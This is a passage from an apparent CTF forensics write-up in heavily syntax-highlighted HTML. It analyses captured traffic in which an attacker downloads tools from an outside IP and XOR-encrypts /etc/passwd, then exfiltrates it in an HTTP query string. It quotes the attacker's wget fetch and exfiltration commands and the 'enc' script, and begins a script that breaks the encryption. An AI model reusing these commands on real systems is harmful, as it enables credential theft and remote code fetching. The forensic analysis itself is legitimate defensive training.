#89DDFF\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8000<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/?<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">exfit<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">$<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">python<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">dev<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">shm<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">enc<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">$<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">cat<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">etc<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">passwd<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">***<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Expert<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Warning<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Illegal<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">characters<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">found<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">header<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">name<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Illegal<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">characters<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">found<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">header<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">name<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Severity<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">level<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Warning<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">            <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Group<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">      <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">80.000715420<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">              <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">379<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">GET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/?<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">exfilt<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FTEjcAhDLjwwTh1IAQ9pTkgKQxU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PxMFSEVFKDwqRVdBBQBvQw8fHhI<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFEVo<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">TCP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">payload<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">325<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">bytes<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">GET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/?<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">exfilt<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FTEjcAhDLjwwTh1IAQ9pTkgKQxU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PxMFSEVFKDwqRVdBBQBvQw8fHhI<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFEVo<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Full<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">request<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">URI<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">http<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/92.117.32.15:2222\/?exfilt=FTEjcAhDLjwwTh1IAQ9pTkgKQxU+BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU\/PxMFSEVFKDwqRVdBBQBvQw8fHhI+HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFEVo=]<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">request<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Response<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">in<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">frame<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p>Inside the dump, we find the following command, which was executed on a remote machine uploading the the webshell from <a href=\"#flag-8-php-webshell-in-image\">Flag 8<\/a>\nand establishing a reverse shell.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>wget <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'92.117.32.15:8000\/tools\/cat.c -O \/dev\/shm\/cat.c &amp;&amp; wget 10.0.2.15:8000\/.local\/bin\/enc -O \/dev\/shm\/enc &amp;&amp; gcc \/dev\/shm\/cat.c -pthread'<\/span>\n<\/pre><\/div>\n\n\n\n<p>This command downloads the <strong>cat<\/strong> program, as well as the <strong>enc<\/strong> script to the victims' server. Later the attacker then tries to encrypt the\n<strong>\/etc\/passwd\/<\/strong> file using the <strong>enc<\/strong> script and attempts to exfiltrate it:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>wget '92.117.32.15:8000\/?exfit=$(python \/dev\/shm\/enc $(cat \/etc\/passwd) ***)'\n<\/pre><\/div>\n\n\n\n<p>We can find the encrypted passwd file within the network traffic too:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>GET \/?exfilt=FTEjcAhDLjwwTh1IAQ9pTkgKQxU+BE0eV1gvfCYVFho7QCoRAB9JQGBARwEFC3BjdERVSERGPQ8QRFU\/PxMFSEVFKDwqRVdBBQBvQw8fHhI+HRIeQEIkIX5bBxtfGjsVAU07GDgeTUkPAHtifk5KSB5AKgZdR1gUfh4YXVpWKD1kVEVSERV5VFIFEVo= HTTP\/1.1\\r\\n\n<\/pre><\/div>\n\n\n\n<p>We can find the <strong>enc<\/strong> script within the <strong>.local\/bin<\/strong> folder of <em>jims<\/em> home directory: <strong>\/mnt\/home\/jim\/.local\/bin\/enc<\/strong>:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">def<\/span> <span class=\"nf\" style=\"background: #263238;color: #82AAFF\">enc<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">s<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">k<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span> \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"DATA=\"<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">s<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">its<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">int<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">math<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ceil<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">len<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span> \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">toenc<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ljust<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">its<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">k<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">its<\/span> \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">exfilt<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">base64<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">b64encode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"sa\" style=\"background: #263238;color: #BB80B3\">b<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">''<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">join<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">a<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">ord<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">b<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">encode<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span> \n    <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">a<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">b<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">zip<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">toenc<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">key<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)))<\/span> \n        <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">exfilt<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span> \n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">enc<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">sys<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">argv<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">],<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">sys<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">argv<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span>\n<\/pre><\/div>\n\n\n\n<p>This script takes two arguments: the message to encrypt and the encryption secret and performs an XOR encryption.\nIn theory XOR encryption is perfectly safe as long keys are not reused, but this implementation contains a number\nof flaws allowing us to break the encryption. First we know that <strong>DATA=<\/strong> well be prepended to the message, and second\nthe message will be padded to a length of a multiple of 20, only using spaces.<\/p>\n\n\n\n<p>This means that we immediately know the first 5 characters of the secret. By guessing how many spaces <strong>n<\/strong> are appended\nto the data, we know the last <strong>n<\/strong> characters of the secret.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nv\" style=\"background: #263238;color: #89DDFF\">secret<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">structure<\/span> <span class=\"ss\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nv\" style=\"background: #263238;color: #89DDFF\">c<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">arbitrary<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">character<\/span><span class=\"ss\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span>         <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">ccccc<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span>        <span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span>        <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">c<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span> <span class=\"ss\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"nv\" style=\"background: #263238;color: #89DDFF\">n<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"ss\" style=\"background: #263238;color: #89DDFF\">)<\/span>             <span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span>         <span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">c<\/span><span class=\"s2\" style=\"background: #263238;color: #C3E88D\">\"<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">n<\/span>\n<span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">cipher<\/span>[<span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span>:<span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span>] <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">DATA=<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'<\/span>  <span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">this<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">part<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">needs<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">to<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">be<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">bruteforced<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">|<\/span>   <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">cipher<\/span>[<span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span> <span class=\"nv\" style=\"background: #263238;color: #89DDFF\">n<\/span>:] <span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span> <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\"> <\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"nv\" style=\"background: #263238;color: #89DDFF\">n<\/span>\n<\/pre><\/div>\n\n\n\n<p>We use this to our advantage and break the encryption using the following script:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">base64<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">itertools<\/span> <span 